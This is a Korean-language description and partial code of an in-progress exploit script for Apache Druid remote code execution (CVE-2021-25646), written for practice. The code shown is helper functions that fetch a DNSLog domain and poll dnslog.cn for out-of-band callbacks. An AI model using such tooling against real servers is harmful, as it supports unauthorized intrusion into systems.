
DNSLog 기반 대역외 탐지 및 자동화된 페이로드 전달을 사용하는 Apache Druid 원격 코드 실행 취약점 CVE-2021-25646용 익스플로잇 스크립트.
작성 중...
=====================================================================================
먼저 Wker 고수의 원격 지원에 감사드립니다.
스크립트를 작성하는 목적은 연습입니다.
스크립트는 DNSLog를 사용하여 판단하며, 취약점이 존재하면 자동으로 dnslog URL을 획득하여 ping 작업을 수행하고, 반환된 결과를 출력합니다.
script\ATTACKUTILS 디렉토리에 dns.wker 파일을 새로 생성합니다.#define dnsqian = Set-Cookie:[
#define dnshou = path=/
#define re = "(.*?)"
function DnsRef(cookie){
res = HttpGet("http://dnslog.cn/getrecords.php?t=0.3741317873165926",cookie.StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
r = StrRe(res[0],re);
if(GetArrayNum(r) >= 3){
return r[3];
}else{
return "";
}
}
function GetDomain(){
array r;
res = HttpGet("http://dnslog.cn/getdomain.php?t=0.16082432252184475","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
tmp = StrSplit(res[0],StrRN());
dns = tmp[0];
cookie = "Cookie: ".GettextMiddle(res[1],dnsqian,dnshou);
ArrayAddEle(r,dns);
ArrayAddEle(r,cookie);
return r;
}
